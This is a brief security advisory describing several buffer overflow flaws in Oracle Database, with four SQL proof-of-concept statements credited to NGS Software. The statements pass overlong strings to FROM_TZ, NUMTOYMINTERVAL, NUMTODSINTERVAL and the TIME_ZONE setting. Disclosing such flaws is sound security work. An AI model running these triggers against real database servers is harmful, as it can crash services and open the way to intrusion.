Multiple Oracle Database Parameter/Statement Buffer Overflow Vulnerabilities

Multiple Oracle Database Parameter/Statement Buffer Overflow Vulnerabilities

The following proof-of-concepts have been made available by NGS Software:

SELECT FROM_TZ(TIMESTAMP '2000-03-28 08:00:00','long string here') FROM DUAL;

SELECT last_name, hire_date, salary, SUM(salary) OVER (ORDER BY hire_date RANGE NUMTOYMINTERVAL(1,'<long string here>') PRECEDING) AS t_sal FROM employees;

SELECT empno, ename, hiredate, COUNT(*) OVER (PARTITION BY empno ORDER BY hiredate RANGE NUMTODSINTERVAL(100, '<long string here>') PRECEDING) AS t_count FROM emp;

ALTER SESSION SET TIME_ZONE = '<long string here>'; SELECT CURRENT_TIMESTAMP, LOCALTIMESTAMP FROM DUAL;